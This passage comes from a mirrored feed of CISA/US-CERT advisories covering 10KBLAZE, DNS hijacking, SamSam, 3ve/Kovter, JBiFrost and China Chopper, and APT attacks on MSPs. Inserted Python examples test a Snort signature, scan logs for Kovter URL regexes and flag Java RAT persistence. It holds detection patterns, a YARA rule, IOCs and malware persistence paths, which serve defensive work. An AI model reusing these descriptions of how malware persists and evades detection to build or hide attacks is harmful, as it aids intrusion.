Restrict authorized hosts via ACL files on Gateways (gw/acl_mode and secinfo) and Message Servers (ms/acl_info). [4], [5]
Review SAP Note 1421005.
Split MS internal/public: rdisp/msserv=0 rdisp/msserv_internal=39NN. [6]
Restrict access to Message Server internal port (tcp/39NN) to clients or the internet.
Enable Secure Network Communications (SNC) for clients.
Scan for exposed SAP components.
Ensure that SAP components are not exposed to the internet.
Remove or secure any exposed SAP components.

References

[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials
[2] SAP: Gateway Access Control Lists
[3] Onapsis Inc. website
[4] SAP Note 1408081
[5] SAP Note 821875
[6] SAP Note 1421005

Revisions

May 2, 2019: Initial version

This product is provided subject to this Notification and this Privacy & Use policy. (more)
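
The payload checks of the signature above, evaluated in plain Python as an added example (this is not CISA's, Onapsis' or Snort's code): it implements the offset, depth, distance:0 and nocase semantics of the rule's four content options and runs them over constructed byte strings, so a defender can see why position and order matter before relying on the rule. The sample payloads are constructed for this example, not captured traffic.

```python
"""
Evaluate the payload checks of the 10KBLAZE Snort signature against raw bytes.

Added example, not code from CISA, Onapsis or the advisory. It re-implements
only the content-matching options the rule uses (content, nocase, offset,
depth, distance:0); flow and sid/rev handling belong to Snort itself. The
sample payloads at the bottom are constructed for this example, not captured
traffic.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Content:
    """One `content` option with the modifiers the signature uses."""
    pattern: bytes
    nocase: bool = False
    offset: int = 0               # absolute start of the search window
    depth: Optional[int] = None   # bytes to search from that start; None = to end
    relative: bool = False        # distance:0 -> start where the previous match ended


# The four content checks of the advisory's rule, in rule order.
# "|06 cb 03|" is Snort's hex notation for three raw bytes.
RULE_10KBLAZE: List[Content] = [
    Content(b"\x06\xcb\x03", offset=4, depth=3),
    Content(b"SAPXPG_START_XPG", nocase=True, relative=True),
    Content(b"37D581E3889AF16DA00A000C290099D0001", nocase=True, relative=True),
    Content(b"extprog", nocase=True, relative=True),
]


def _find(haystack: bytes, needle: bytes, nocase: bool) -> int:
    """bytes.find with optional case folding (Snort `nocase`)."""
    if nocase:
        return haystack.lower().find(needle.lower())
    return haystack.find(needle)


def matches(payload: bytes, rule: List[Content] = RULE_10KBLAZE) -> bool:
    """True when every content check matches, in order and within its window.

    `offset` fixes where an absolute search begins, `depth` bounds how many
    bytes from that point are examined (so offset:4 depth:3 pins the three
    marker bytes to positions 4..6), and a relative check begins exactly at
    the end of the previous match, which is why the strings must appear in
    rule order.
    """
    cursor = 0  # end of the previous match
    for check in rule:
        start = cursor if check.relative else check.offset
        end = len(payload) if check.depth is None else min(len(payload), start + check.depth)
        pos = _find(payload[start:end], check.pattern, check.nocase)
        if pos < 0:
            return False
        cursor = start + pos + len(check.pattern)
    return True


# Constructed vectors: a hit with mixed case (exercises nocase), the same
# strings out of rule order, and the marker bytes outside the offset:4/depth:3 window.
FILL = b"\x00" * 4
SAMPLE_HIT = (b"\x00\x00\x01\x2c" + b"\x06\xcb\x03" + FILL
              + b"sapxpg_start_xpg" + FILL
              + b"37d581e3889af16da00a000c290099d0001" + FILL + b"EXTPROG")
SAMPLE_OUT_OF_ORDER = (b"\x00\x00\x01\x2c" + b"\x06\xcb\x03" + b"extprog"
                       + b"SAPXPG_START_XPG" + b"37D581E3889AF16DA00A000C290099D0001")
SAMPLE_WRONG_OFFSET = (b"\x00" * 8 + b"\x06\xcb\x03" + b"SAPXPG_START_XPG"
                       + b"37D581E3889AF16DA00A000C290099D0001" + b"extprog")


if __name__ == "__main__":
    for name, sample in [("hit", SAMPLE_HIT), ("out_of_order", SAMPLE_OUT_OF_ORDER),
                         ("wrong_offset", SAMPLE_WRONG_OFFSET)]:
        print(f"{name}: {'ALERT' if matches(sample) else 'no match'}")
```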

Posted on 3 May 2019 1:54 am


Orpak SiteOmat

Advisory Document (more)

Posted on 2 May 2019 7:10 pm


GE Communicator

Advisory Document (more)

Posted on 2 May 2019 7:05 pm


Sierra Wireless AirLink ALEOS

Advisory Document (more)

Posted on 2 May 2019 7:00 pm


Philips Tasy EMR

Advisory Document (more)

Posted on 30 April 2019 7:05 pm


Rockwell Automation CompactLogix 5370


Advisory Document (more)

Posted on 30 April 2019 7:00 pm


Fujifilm FCR Capsula X/Carbon X

Advisory Document (more)

Posted on 23 April 2019 7:05 pm


Rockwell Automation MicroLogix 1400 and CompactLogix 5370 Controllers

Advisory Document (more)

Posted on 23 April 2019 7:00 pm


AA19-024A: DNS Infrastructure Hijacking Campaign

Original release date: January 24, 2019 | Last revised: February 13, 2019

Summary

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization’s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization’s domain names, enabling man-in-the-middle attacks.

See the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below: IOCs (.csv), IOCs (.stix)

Note: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses: 107.161.23.204, 192.161.187.200, 209.141.38.71

Technical Details

Using the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.

The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.

Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.

Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization’s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.

Mitigations

NCCIC recommends the following best practices to help safeguard networks against this threat:

Update the passwords for all accounts that can change organizations’ DNS records.
Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.
Audit public DNS records to verify they are resolving to the intended location.
Search for encryption certificates related to domains and revoke any fraudulently requested certificates.

References

Cisco Talos blog: DNSpionage Campaign Targets Middle East
CERT-OPMD blog: [DNSPIONAGE] – Focus on internal actions
FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale
Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors

Revisions

January 24, 2019: Initial version
February 6, 2019: Updated IOCs, added Crowdstrike blog
February 13, 2019: Updated IOCs

This product is provided subject to this Notification and this Privacy & Use policy. (more)

Posted on 24 January 2019 10:01 pm


AA18-337A: SamSam Ransomware

Original release date: December 03, 2018

Summary

The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform computer network defenders about SamSam ransomware, also known as MSIL/Samas.A. Specifically, this product shares analysis of vulnerabilities that cyber actors exploited to deploy this ransomware. In addition, this report provides recommendations for prevention and mitigation.

The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally. Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.

The actors exploit Windows servers to gain persistent access to a victim’s network and infect all reachable hosts. According to reporting from victims in early 2016, cyber actors used the JexBoss Exploit Kit to access vulnerable JBoss applications. Since mid-2016, FBI analysis of victims’ machines indicates that cyber actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks. Typically, actors either use brute force attacks or stolen login credentials. Detecting RDP intrusions can be challenging because the malware enters through an approved access point.

After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.

Analysis of tools found on victims’ networks indicated that successful cyber actors purchased several of the stolen RDP credentials from known darknet marketplaces. FBI analysis of victims’ access logs revealed that the SamSam actors can infect a network within hours of purchasing the credentials. While remediating infected systems, several victims found suspicious activity on their networks unrelated to SamSam. This activity is a possible indicator that the victims’ credentials were stolen, sold on the darknet, and used for other illegal activity.

SamSam actors leave ransom notes on encrypted computers. These instructions direct victims to establish contact through a Tor hidden service site. After paying the ransom in Bitcoin and establishing contact, victims usually receive links to download cryptographic keys and tools to decrypt their network.

Technical Details

NCCIC recommends organizations review the following SamSam Malware Analysis Reports. The reports represent four SamSam malware variants. This is not an exhaustive list.

MAR-10219351.r1.v2 – SamSam1
MAR-10166283.r1.v1 – SamSam2
MAR-10158513.r1.v1 – SamSam3
MAR-10164494.r1.v1 – SamSam4

For general information on ransomware, see the NCCIC Security Publication at https://www.us-cert.gov/security-publications/Ransomware.

Mitigations

DHS and FBI recommend that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes before implementation to avoid unwanted impacts.

Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
Enable strong passwords and account lockout policies to defend against brute force attacks. Where possible, apply two-factor authentication.
Regularly apply system and software updates.
Maintain a good back-up strategy.
Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
Ensure that third parties that require RDP access follow internal policies on remote access.
Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
Restrict users' ability (permissions) to install and run unwanted software applications.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

Additional information on malware incident prevention and handling can be found in Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops, from the National Institute of Standards and Technology. [1]

Contact Information

To report an intrusion and request resources for incident response or technical assistance, contact NCCIC, FBI, or the FBI’s Cyber Division via the following information:

NCCIC: NCCICCustomerService@hq.dhs.gov, 888-282-0870
FBI’s Cyber Division: CyWatch@fbi.gov, 855-292-3937
FBI through a local field office

Feedback

DHS strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: https://www.us-cert.gov/forms/feedback.

References

[1] NIST SP 800-83: Guide to Malware Incident Prevention and Handling for Desktops and Laptops

Revisions

December 3, 2018: Initial version

This product is provided subject to this Notification and this Privacy & Use policy. (more)

Posted on 3 December 2018 6:18 pm


TA18-331A: 3ve – Major Online Ad Fraud Operation

Original release date: November 27, 2018

Systems Affected

Microsoft Windows

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). DHS and FBI are releasing this TA to provide information about a major online ad fraud operation—referred to by the U.S. Government as "3ve"—involving the control of over 1.7 million unique Internet Protocol (IP) addresses globally, when sampled over a 10-day window.

Description

Online advertisers desire premium websites on which to publish their ads and large numbers of visitors to view those ads. 3ve created fake versions of both (websites and visitors), and funneled the advertising revenue to cyber criminals. 3ve obtained control over 1.7 million unique IPs by leveraging victim computers infected with Boaxxe/Miuref and Kovter malware, as well as Border Gateway Protocol-hijacked IP addresses.

Boaxxe/Miuref Malware

Boaxxe malware is spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Boaxxe botnet is primarily located in a data center. Hundreds of machines in this data center are browsing to counterfeit websites. When these counterfeit webpages are loaded into a browser, requests are made for ads to be placed on these pages. The machines in the data center use the Boaxxe botnet as a proxy to make requests for these ads. A command and control (C2) server sends instructions to the infected botnet computers to make the ad requests in an effort to hide their true data center IPs.

Kovter Malware

Kovter malware is also spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Kovter botnet runs a hidden Chromium Embedded Framework (CEF) browser on the infected machine that the user cannot see. A C2 server tells the infected machine to visit counterfeit websites. When the counterfeit webpage is loaded in the hidden browser, requests are made for ads to be placed on these counterfeit pages. The infected machine receives the ads and loads them into the hidden browser.

Impact

For the indicators of compromise (IOCs) below, keep in mind that any one indicator on its own may not necessarily mean that a machine is infected. Some IOCs may be present for legitimate applications and network traffic as well, but are included here for completeness.

Boaxxe/Miuref Malware

Boaxxe malware leaves several executables on the infected machine. They may be found in one or more of the following locations:

%UserProfile%\AppData\Local\VirtualStore\lsass.aaa
%UserProfile%\AppData\Local\Temp\<RANDOM>.exe
%UserProfile%\AppData\Local\<Random eight-character folder name>\<original file name>.exe

The HKEY_CURRENT_USER (HKCU) “Run” key is set to the path to one of the executables created above.

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<Above path to executable>\

Kovter Malware

Kovter malware is found mostly in the registry, but the following files may be found on the infected machine:

%UserProfile%\AppData\Local\Temp\<RANDOM>.exe/.bat
%UserProfile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\<RANDOM>\<RANDOM FILENAME>.exe
%UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.lnk
%UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.bat

Kovter is known to hide in the registry under:

HKCU\SOFTWARE\<RANDOM>\<RANDOM>

The customized CEF browser is dropped to:

%UserProfile%\AppData\Local\<RANDOM>

The keys will look like random values and contain scripts. In some values, a User-Agent string can be clearly identified. An additional key containing a link to a batch script on the hard drive may be placed within registry key:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

There are several patterns in the network requests that are made by Kovter malware when visiting the counterfeit websites. The following are regex rules for these URL patterns:

/?ptrackp=\d{5,8}
/feedrs\d/click?feed_id=\d{1,5}&sub_id=\d{1,5}&cid=[a-f0-9-]*&spoof_domain=[\w\.\d-_]*&land_ip=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
/feedrs\d/vast_track?a=impression&feed_id=\d{5}&sub_id=\d{1,5}&sub2_id=\d{1,5}&cid=[a-f\d-]

The following is a YARA rule for detecting Kovter:

rule KovterUnpacked {
  meta:
    desc = "Encoded strings in unpacked Kovter samples."
  strings:
    $ = "7562@3B45E129B93"
    $ = "@ouhKndCny"
    $ = "@ouh@mmEdctffdsr"
    $ = "@ouhSGQ"
  condition:
    all of them
}

Solution

If you believe you may be a victim of 3ve and its associated malware or hijacked IPs, and have information that may be useful to investigators, submit your complaint to www.ic3.gov and use the hashtag 3ve (#3ve) in the body of your complaint.

DHS and FBI advise users to take the following actions to remediate malware infections associated with Boaxxe/Miuref or Kovter:

Use and maintain antivirus software. Antivirus software recognizes and protects your computer against most known viruses. Security companies are continuously updating their software to counter these advanced threats. Therefore, it is important to keep your antivirus software up-to-date. If you suspect you may be a victim of malware, update your antivirus software definitions and run a full-system scan. (See Understanding Anti-Virus Software for more information.)

Avoid clicking links in email. Attackers have become very skilled at making phishing emails look legitimate. Users should ensure the link is legitimate by typing the link into a new browser. (See Avoiding Social Engineering and Phishing Attacks.)

Change your passwords. Your original passwords may have been compromised during the infection, so you should change them. (See Choosing and Protecting Passwords.)

Keep your operating system and application software up-to-date. Install software patches so that attackers cannot take advantage of known problems or vulnerabilities. You should enable automatic updates of the operating system if this option is available. (See Understanding Patches and Software Updates for more information.)

Use anti-malware tools. Using a legitimate program that identifies and removes malware can help eliminate an infection... (more)
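
The three Kovter URL patterns above, applied to proxy log lines as an added example (not DHS/FBI code and not part of the alert). The advisory's patterns are rewritten as valid Python regexes: the `?` that opens each query string is escaped as a literal, and the class `[\w\.\d-_]` becomes `[\w.-]` (`\w` already covers digits and underscore). The log format (epoch, client IP, method, URL), the log lines and the two-pattern triage threshold are constructed assumptions of this example, the threshold reflecting the alert's note that a single indicator alone need not mean infection.

```python
r"""
Scan proxy log lines for the Kovter URL patterns published in TA18-331A.

Added example, not code from DHS/FBI or the alert. The advisory's three
patterns are rewritten here as valid Python regexes: the '?' that begins each
query string is escaped as a literal, and the class [\w\.\d-_] is written as
[\w.-] (\w already covers digits and underscore). The log format
(epoch client_ip method url) and the log lines are constructed for this example.
"""
import re
from typing import Dict, Iterable, List

KOVTER_URL_PATTERNS = {
    "ptrackp": re.compile(r"/\?ptrackp=\d{5,8}"),
    "feedrs_click": re.compile(
        r"/feedrs\d/click\?feed_id=\d{1,5}&sub_id=\d{1,5}&cid=[a-f0-9-]*"
        r"&spoof_domain=[\w.-]*&land_ip=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    ),
    "feedrs_vast": re.compile(
        r"/feedrs\d/vast_track\?a=impression&feed_id=\d{5}&sub_id=\d{1,5}"
        r"&sub2_id=\d{1,5}&cid=[a-f\d-]"
    ),
}

# Constructed sample log (not real traffic). Host 10.0.0.21 hits all three
# patterns; host 10.0.0.35 makes one benign request and one near-miss whose
# feed_id is not numeric, so it must not match.
SAMPLE_LOG = """\
1543363200.101 10.0.0.21 GET http://ads.example/?ptrackp=48213
1543363201.553 10.0.0.21 GET http://ads.example/feedrs3/click?feed_id=12&sub_id=7&cid=0a1b2c-3d&spoof_domain=news.example&land_ip=198.51.100.23
1543363202.004 10.0.0.35 GET http://ads.example/index.html
1543363203.777 10.0.0.21 GET http://ads.example/feedrs1/vast_track?a=impression&feed_id=12345&sub_id=7&sub2_id=3&cid=a
1543363204.120 10.0.0.35 GET http://ads.example/feedrs3/click?feed_id=abc&sub_id=7
"""


def classify_url(url: str) -> List[str]:
    """Names of the Kovter patterns that match anywhere in the URL."""
    return [name for name, rx in KOVTER_URL_PATTERNS.items() if rx.search(url)]


def scan_log(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Map each client IP to the distinct Kovter patterns it triggered, in log order."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        parts = line.split(maxsplit=3)
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the scan
        _ts, client, _method, url = parts
        for name in classify_url(url):
            found = hits.setdefault(client, [])
            if name not in found:
                found.append(name)
    return hits


def suspect_hosts(hits: Dict[str, List[str]], min_patterns: int = 2) -> List[str]:
    """Hosts worth triage.

    The alert notes that one indicator alone need not mean infection, so this
    example (as its own assumption) requires at least `min_patterns` distinct
    patterns from the same client before flagging it.
    """
    return [ip for ip, names in hits.items() if len(names) >= min_patterns]


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for ip, names in found.items():
        print(f"{ip}: {', '.join(names)}")
    print("triage:", suspect_hosts(found))
```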

Posted on 27 November 2018 7:09 pm


AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide

Original release date: October 11, 2018 Summary This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States. [1] [2] [3] [4] [5] In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are: Remote Access Trojan: JBiFrost Webshell: China Chopper Credential Stealer: Mimikatz Lateral Movement Framework: PowerShell Empire C2 Obfuscation and Exfiltration: HUC Packet Transmitter To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network. The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense. Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals. The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution. Experience from all our countries makes it clear that, while cyber threat actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated threat actor groups use common, publicly available tools to achieve their objectives. 
Whatever these objectives may be, initial compromises of victim systems are often established through exploitation of common security weaknesses. Abuse of unpatched software vulnerabilities or of poorly configured systems is a common way for a threat actor to gain access. The tools detailed in this Activity Alert come into play once a compromise has been achieved, enabling attackers to further their objectives within the victim's systems.

How to Use This Report

The tools detailed in this Activity Alert fall into five categories: Remote Access Trojans (RATs), webshells, credential stealers, lateral movement frameworks, and command and control (C2) obfuscators. This Activity Alert provides an overview of the threat posed by each tool, along with insight into where and when it has been deployed by threat actors. Measures to aid detection and limit the effectiveness of each tool are also described. The Activity Alert concludes with general advice for improving network defense practices.

Technical Details

Remote Access Trojan: JBiFrost

First observed in May 2015, the JBiFrost RAT is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT from 2012. A RAT is a program that, once installed on a victim's machine, allows remote administrative control. In a malicious context, it can, among many other functions, be used to install backdoors and key loggers, take screenshots, and exfiltrate data. Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programs and can mimic the behavior of legitimate applications. To hinder forensic analysis, RATs have been known to disable security tools (e.g., Task Manager) and network analysis tools (e.g., Wireshark) on the victim's system.

In Use

JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors. Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors. Threat actors have repeatedly compromised servers in our countries with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation, or to steal valuable information such as banking credentials, intellectual property, or personally identifiable information (PII).

Capabilities

JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, Mac OS X, and Android. JBiFrost RAT allows threat actors to pivot and move laterally across a network or install additional malicious software. It is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice, or with a link to a file hosting service. Past infections have exfiltrated intellectual property, banking credentials, and PII. Machines infected with JBiFrost RAT can also be used in botnets to carry out distributed denial-of-service attacks.

Examples

Since early 2018, we have observed an increase in JBiFrost RAT being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT's hosting on infrastructure located in our countries. In early 2017, Adwind RAT was deployed via spoofed emails designed to look as if they originated from Society for Worldwide Interbank Financial Telecommunication (SWIFT) network services. Many other publicly available RATs, including variations of Gh0st RAT, have also been observed in use against a range of victims worldwide.

Detection and Protection

Some possible indications of a JBiFrost RAT infection can include, but are not limited to:
- Inability to restart the computer in safe mode,
- Inability to open the Windows Registry Editor or Task Manager,
- Significant increase in disk activity and/or network traffic,
- Connection attempts to known malicious Internet Protocol (IP) addresses, and
- Creation of new files and directories with obfuscated or random names.

Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your organization is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently. Strict application whitelisting is recommended to prevent infections from occurring. The initial infection mechanism for RATs, including JBiFrost RAT, can be via phishing emails... (more)
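Two of the indicators above, connections to known-malicious addresses and a Java-based payload persisting under a user-writable path, can be checked from an autorun inventory and a connection table. The following is an added example written for this page, not code from the alert: the autorun entries, connection records, blocklist and internal address ranges are all constructed, and the "Java launched with a jar from AppData or Temp" and "Java runtime talking to a non-web port outside the estate" rules are the editor's heuristics for a Java RAT such as JBiFrost, not signatures published by the alert.

```python
"""Triage helpers for the JBiFrost-style indicators above (added example).
Input data is constructed for illustration; the detection rules are the
editor's heuristics, not signatures from the alert."""
import ipaddress
import re

# Constructed autorun inventory: (registry key, value name, command line).
SAMPLE_RUN_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "WindowsUpdate",
     r'"C:\Program Files\Java\jre1.8.0_201\bin\javaw.exe" -jar '
     r'"C:\Users\alice\AppData\Roaming\Oracle\bin\xKqP2vD9.jar"'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

# Constructed outbound connections: (pid, image path, remote IP, remote port).
SAMPLE_CONNECTIONS = [
    (4120, r"C:\Program Files\Java\jre1.8.0_201\bin\javaw.exe", "203.0.113.77", 1604),
    (2216, r"C:\Program Files\Mozilla Firefox\firefox.exe", "198.51.100.10", 443),
    (4120, r"C:\Program Files\Java\jre1.8.0_201\bin\javaw.exe", "10.0.0.5", 8080),
    (4120, r"C:\Program Files\Java\jre1.8.0_201\bin\javaw.exe", "192.0.2.50", 1604),
]

# Hypothetical blocklist (documentation-range address, not a real IOC).
KNOWN_BAD_IPS = {"203.0.113.77"}
# Address space treated as "inside"; adjust to the estate (assumption).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WEB_PORTS = {80, 443}

# A Java runtime started with a jar as its payload; group 2 is the jar path.
JAVA_JAR = re.compile(r'javaw?(\.exe)?"?\s+.*?-jar\s+"?([^"\s]+\.jar)', re.I)
# Locations an unprivileged user can write to, i.e. where a phishing
# attachment can drop its payload without elevation.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)


def flag_run_entries(entries):
    """Autorun values that launch Java with a jar from a user-writable path."""
    findings = []
    for key, name, cmd in entries:
        match = JAVA_JAR.search(cmd)
        if match and USER_WRITABLE.search(match.group(2)):
            findings.append({"rule": "java-jar-from-user-path", "key": key,
                             "value": name, "jar": match.group(2)})
    return findings


def flag_connections(conns, bad_ips=KNOWN_BAD_IPS):
    """Connections to blocklisted addresses, plus Java runtimes talking to
    non-web ports outside the internal ranges (a JRE on a workstation rarely
    needs that; treat it as a lead, not proof)."""
    findings = []
    for pid, image, ip, port in conns:
        addr = ipaddress.ip_address(ip)
        exe = image.rsplit("\\", 1)[-1].lower()
        internal = any(addr in net for net in INTERNAL_NETS)
        if ip in bad_ips:
            findings.append({"rule": "known-bad-ip", "pid": pid, "image": exe,
                             "dst": f"{ip}:{port}"})
        elif exe in {"java.exe", "javaw.exe"} and not internal and port not in WEB_PORTS:
            findings.append({"rule": "java-nonweb-egress", "pid": pid, "image": exe,
                             "dst": f"{ip}:{port}"})
    return findings


if __name__ == "__main__":
    for finding in flag_run_entries(SAMPLE_RUN_ENTRIES) + flag_connections(SAMPLE_CONNECTIONS):
        print(finding)
```

The value name "WindowsUpdate" pointing at a jar under AppData\Roaming is the pattern to look for: the name mimics a Windows component, but the payload lives where the logged-on user, and therefore a phishing attachment, can write. Feed the functions real autorun and netstat exports in the same tuple shape and baseline the Java rule against any in-house Java clients before alerting on it.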

Posted on 11 October 2018 6:19 pm


TA18-276B: Advanced Persistent Threat Activity Exploiting Managed Service Providers

Original release date: October 03, 2018

Systems Affected

Network Systems

Overview

The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs). Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing. This Technical Alert (TA) provides information and guidance to assist MSP customer network and system administrators with the detection of malicious activity on their networks and systems and the mitigation of associated risks. This TA includes an overview of TTPs used by APT actors in MSP network environments, recommended mitigation techniques, and information on reporting incidents.

Description

MSPs provide remote management of customer IT and end-user systems. The number of organizations using MSPs has grown significantly over recent years because MSPs allow their customers to scale and support their network environments at a lower cost than financing these resources internally. MSPs generally have direct and unfettered access to their customers' networks, and may store customer data on their own internal infrastructure. By servicing a large number of customers, MSPs can achieve significant economies of scale. However, a compromise in one part of an MSP's network can spread globally, affecting other customers and introducing risk. Using an MSP significantly increases an organization's virtual enterprise infrastructure footprint and its number of privileged accounts, creating a larger attack surface for cyber criminals and nation-state actors.

By using compromised legitimate MSP credentials (e.g., administration, domain, user), APT actors can move bidirectionally between an MSP and its customers' shared networks. Bidirectional movement between networks allows APT actors to evade detection measures and maintain a presence on victims' networks.

Note: NCCIC previously released information related to this activity in Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors, published on April 27, 2017, which includes indicators of compromise, signatures, suggested detection methods, and recommended mitigation techniques.

Technical Details

APT actors use a range of "living off the land" techniques to maintain anonymity while conducting their attacks. These techniques include using legitimate credentials and trusted off-the-shelf applications and pre-installed system tools present in MSP customer networks. Pre-installed system tools, such as command line scripts, are very common and used by system administrators for legitimate processes. Command line scripts are used to discover accounts and remote systems. PowerSploit is a repository of Microsoft PowerShell and Visual Basic scripts and uses system commands such as netsh. PowerSploit, originally developed as a legitimate penetration testing tool, is widely misused by APT actors. These scripts often cannot be blocked because they are legitimate tools, so APT actors can use them and remain undetected on victim networks. Although network defenders can generate log files, APT actors' use of legitimate scripts makes it difficult to identify system anomalies and other malicious activity.

When APT actors use system tools and common cloud services, it can also be difficult for network defenders to detect data exfiltration. APT actors have been observed using Robocopy, a Microsoft command line tool, to transfer exfiltrated and archived data from MSP client networks back through MSP network environments. Additionally, APT actors have been observed using legitimate PuTTY Secure Copy Client functions, allowing them to transfer stolen data securely and directly to third-party systems.

Impact

A successful network intrusion can have severe impacts to the affected organization, particularly if the compromise becomes public. Possible impacts include:
- Temporary or permanent loss of sensitive or proprietary information,
- Disruption to regular operations,
- Financial losses to restore systems and files, and
- Potential harm to the organization's reputation.

Solution

Detection

Organizations should configure system logs to detect incidents and to identify the type and scope of malicious activity. Properly configured logs enable rapid containment and appropriate response.

Response

An organization's ability to rapidly respond to and recover from an incident begins with the development of an incident response capability. An organization's response capability should focus on being prepared to handle the most common attack vectors (e.g., spearphishing, malicious web content, credential theft). In general, organizations should prepare by:
- Establishing and periodically updating an incident response plan.
